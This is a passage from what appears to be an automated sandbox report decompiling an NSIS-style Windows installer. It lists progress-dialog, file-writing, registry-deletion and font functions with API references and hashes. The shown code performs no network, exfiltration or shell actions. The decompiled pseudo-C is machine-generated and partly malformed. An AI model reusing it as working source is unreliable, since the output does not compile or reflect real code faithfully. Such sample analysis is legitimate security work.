					 *0x41f904 = 0;
					return _t15;
				}
				__eflags =  *0x41f904; // 0x0
				if(__eflags != 0) {
					return E0040666D(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x424750;
				if(_t6 >  *0x424750) {
					__eflags =  *0x424748;
					if( *0x424748 == 0) {
						_t7 = CreateDialogParamA( *0x424740, 0x6f, 0, E00402DBA, 0);
						 *0x41f904 = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424814 & 0x00000001;
					if(( *0x424814 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E0040534F(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                            0x00402e5e
                                                                            0x00402e60
                                                                            0x00402e67
                                                                            0x00402e6a
                                                                            0x00402e6a
                                                                            0x00402e70
                                                                            0x00000000
                                                                            0x00402e70
                                                                            0x00402e78
                                                                            0x00402e7e
                                                                            0x00000000
                                                                            0x00402e81
                                                                            0x00402e88
                                                                            0x00402e8e
                                                                            0x00402e94
                                                                            0x00402e96
                                                                            0x00402e9c
                                                                            0x00402eda
                                                                            0x00402ee3
                                                                            0x00000000
                                                                            0x00402ee8
                                                                            0x00402e9e
                                                                            0x00402ea5
                                                                            0x00402eb6
                                                                            0x00000000
                                                                            0x00402ec4
                                                                            0x00402ea5
                                                                            0x00402ef0

                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402E6A
                                                                            • GetTickCount.KERNEL32 ref: 00402E88
                                                                            • wsprintfA.USER32 ref: 00402EB6
                                                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                              • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                              • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                              • Part of subcall function 00402E36: MulDiv.KERNEL32(0002381E,00000064,00026073), ref: 00402E4B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                            • String ID: ... %d%%
                                                                            • API String ID: 722711167-2449383134
                                                                            • Opcode ID: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                                                            • Instruction ID: 7a453c914e71352c87dd6fc4fa143b29ed4b83a6d55c3b122a6f25389f326a81
                                                                            • Opcode Fuzzy Hash: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                                                            • Instruction Fuzzy Hash: 22018470582214E7CB61AB64EF0DAAF766CEB41745B14403BF801F21E0C7B95846CAEE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404BFF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00404BFF(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                            0x00404c0d
                                                                            0x00404c1a
                                                                            0x00404c20
                                                                            0x00404c5e
                                                                            0x00404c5e
                                                                            0x00404c6d
                                                                            0x00404c74
                                                                            0x00000000
                                                                            0x00404c76
                                                                            0x00404c22
                                                                            0x00404c31
                                                                            0x00404c39
                                                                            0x00404c3c
                                                                            0x00404c4e
                                                                            0x00404c54
                                                                            0x00404c5b
                                                                            0x00000000
                                                                            0x00404c5b
                                                                            0x00000000

                                                                            APIs
                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C1A
                                                                            • GetMessagePos.USER32 ref: 00404C22
                                                                            • ScreenToClient.USER32 ref: 00404C3C
                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C4E
                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C74
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                            • Instruction ID: 8affecd5b479f1171f5654815cc51d63bffccf6ae5a63c5c4c29235a80b14989
                                                                            • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                            • Instruction Fuzzy Hash: 34015E71900219BBEB00DBA4DD85FFFBBBCAF55711F10012BBA50B61D0D7B4A9418BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x424754 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                            0x00402dc7
                                                                            0x00402dd5
                                                                            0x00402ddb
                                                                            0x00402ddb
                                                                            0x00402de9
                                                                            0x00402deb
                                                                            0x00402df7
                                                                            0x00402dfc
                                                                            0x00402dfe
                                                                            0x00402dfe
                                                                            0x00402e09
                                                                            0x00402e19
                                                                            0x00402e2b
                                                                            0x00402e2b
                                                                            0x00402e33

                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                            • wsprintfA.USER32 ref: 00402E09
                                                                            • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                                            • SetDlgItemTextA.USER32 ref: 00402E2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                            • API String ID: 1451636040-1158693248
                                                                            • Opcode ID: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                                                            • Instruction ID: 5924424b8475f9adf48b5715c1e1f77af8692632bd00ddb5f136e7bd4fbbb8aa
                                                                            • Opcode Fuzzy Hash: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                                                            • Instruction Fuzzy Hash: 36F01D7154020DFBEF20AF60DE0ABAE3769EB54345F00803AFA16B51D0DBB899558B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 93%
                                                                            			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C2D(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405D9C(_t50);
				_t26 = E00405DC1(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x424758;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403419(_t45);
						E00403403(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E00403192(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405D7C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E68( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00403192(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                            0x004027df
                                                                            0x004027e1
                                                                            0x004027ed
                                                                            0x004027f0
                                                                            0x004027fa
                                                                            0x004027fe
                                                                            0x004027fe
                                                                            0x00402804
                                                                            0x00402811
                                                                            0x00402819
                                                                            0x0040281c
                                                                            0x00402822
                                                                            0x00402830
                                                                            0x00402835
                                                                            0x00402839
                                                                            0x0040283c
                                                                            0x00402845
                                                                            0x00402851
                                                                            0x00402855
                                                                            0x00402858
                                                                            0x00402862
                                                                            0x00402887
                                                                            0x00402869
                                                                            0x0040286e
                                                                            0x00402876
                                                                            0x0040287c
                                                                            0x00402881
                                                                            0x00402881
                                                                            0x0040288e
                                                                            0x0040288e
                                                                            0x0040289b
                                                                            0x004028a1
                                                                            0x004028b3
                                                                            0x004028b3
                                                                            0x004028b9
                                                                            0x004028b9
                                                                            0x004028c4
                                                                            0x004028c5
                                                                            0x004028c9
                                                                            0x004028cd
                                                                            0x004028d3
                                                                            0x004028d3
                                                                            0x004028da
                                                                            0x004022dd
                                                                            0x00402a5d
                                                                            0x00402a69

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                            • GlobalFree.KERNEL32 ref: 0040288E
                                                                            • GlobalFree.KERNEL32 ref: 004028A1
                                                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                                                            • Instruction ID: d0efecf462ec4b8749248d5ce184abccdfd1d8ac98bc27b14fb78a8abc9ee6f4
                                                                            • Opcode Fuzzy Hash: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                                                            • Instruction Fuzzy Hash: A5217C72800128BBDB216FA5CE48D9E7E79EF09364F10823EF461762E1C67949418BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404AF5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E00404AF5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062BB(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062BB(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062BB(_t41, _t47, 0x420d50, 0x420d50, _a8);
				wsprintfA(_t32 + lstrlenA(0x420d50), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423f18, _a4, 0x420d50);
			}



















                                                                            0x00404afb
                                                                            0x00404b00
                                                                            0x00404b08
                                                                            0x00404b09
                                                                            0x00404b16
                                                                            0x00404b1e
                                                                            0x00404b1f
                                                                            0x00404b21
                                                                            0x00404b23
                                                                            0x00404b25
                                                                            0x00404b28
                                                                            0x00404b28
                                                                            0x00404b2f
                                                                            0x00404b35
                                                                            0x00404b35
                                                                            0x00404b3c
                                                                            0x00404b43
                                                                            0x00404b46
                                                                            0x00404b49
                                                                            0x00404b49
                                                                            0x00404b4d
                                                                            0x00404b5d
                                                                            0x00404b5f
                                                                            0x00404b62
                                                                            0x00404b0b
                                                                            0x00404b0b
                                                                            0x00404b12
                                                                            0x00404b12
                                                                            0x00404b6a
                                                                            0x00404b75
                                                                            0x00404b8b
                                                                            0x00404b9b
                                                                            0x00404bb7

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                                                            • wsprintfA.USER32 ref: 00404B9B
                                                                            • SetDlgItemTextA.USER32 ref: 00404BAE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$PB
                                                                            • API String ID: 3540041739-838025833
                                                                            • Opcode ID: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                                                            • Instruction ID: 5179c0f035392565bdab74c0efbe7b8420b5ea1509705373073e4f645d5961bf
                                                                            • Opcode Fuzzy Hash: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                                                            • Instruction Fuzzy Hash: 6011B773A0412437DB10656D9C45FAE329CDB85374F25023BFA26F31D1E978DC1282E9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 48%
                                                                            			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060AE(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406631(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                            0x00402cdb
                                                                            0x00402ce4
                                                                            0x00402ced
                                                                            0x00402cf9
                                                                            0x00402d02
                                                                            0x00402d0c
                                                                            0x00402d31
                                                                            0x00402d37
                                                                            0x00402d3c
                                                                            0x00402d3d
                                                                            0x00402d6d
                                                                            0x00402d46
                                                                            0x00402d48
                                                                            0x00402d98
                                                                            0x00402d9b
                                                                            0x00000000
                                                                            0x00402da1
                                                                            0x00402d57
                                                                            0x00402d5c
                                                                            0x00402d5e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402d66
                                                                            0x00402d6b
                                                                            0x00402d6c
                                                                            0x00402d6c
                                                                            0x00402d79
                                                                            0x00402d81
                                                                            0x00402d88
                                                                            0x00000000
                                                                            0x00402db1
                                                                            0x00000000
                                                                            0x00402d90
                                                                            0x00402d1c
                                                                            0x00402d2f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402d2f
                                                                            0x00402db7

                                                                            APIs
                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CloseEnum$DeleteValue
                                                                            • String ID:
                                                                            • API String ID: 1354259210-0
                                                                            • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                            • Instruction ID: 3131e3f6e31e27b0aa66d3651422ecf58d36830b066a5e7c74bd8b9791dc988a
                                                                            • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                            • Instruction Fuzzy Hash: 21215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48F64AA68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x424740,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                            0x00401d65
                                                                            0x00401d69
                                                                            0x00401d7e
                                                                            0x00401d6b
                                                                            0x00401d6d
                                                                            0x00401d73
                                                                            0x00401d73
                                                                            0x00401d84
                                                                            0x00401d87
                                                                            0x00401d91
                                                                            0x00401d94
                                                                            0x00401d9c
                                                                            0x00401dad
                                                                            0x00401db0
                                                                            0x00401dbb
                                                                            0x00401db2
                                                                            0x00401db4
                                                                            0x00401db4
                                                                            0x00401dbf
                                                                            0x00401dcc
                                                                            0x00401df3
                                                                            0x00401e02
                                                                            0x00401e10
                                                                            0x00401e18
                                                                            0x00401e20
                                                                            0x00401e20
                                                                            0x00401e29
                                                                            0x00401e2f
                                                                            0x004029a5
                                                                            0x004029a5
                                                                            0x00402a5d
                                                                            0x00402a69

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                                                            • Instruction ID: 488f83a01e3392fad3bf683b4443aaeb9baaf514c425c8ec37ca45fc88de17ea
                                                                            • Opcode Fuzzy Hash: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                                                            • Instruction Fuzzy Hash: E9212A72E00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 73%
                                                                            			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b830 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b837 = 1;
				 *0x40b834 = _t15 & 0x00000001;
				 *0x40b835 = _t15 & 0x00000002;
				 *0x40b836 = _t15 & 0x00000004;
				E004062BB(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b820);
				_push(_t18);
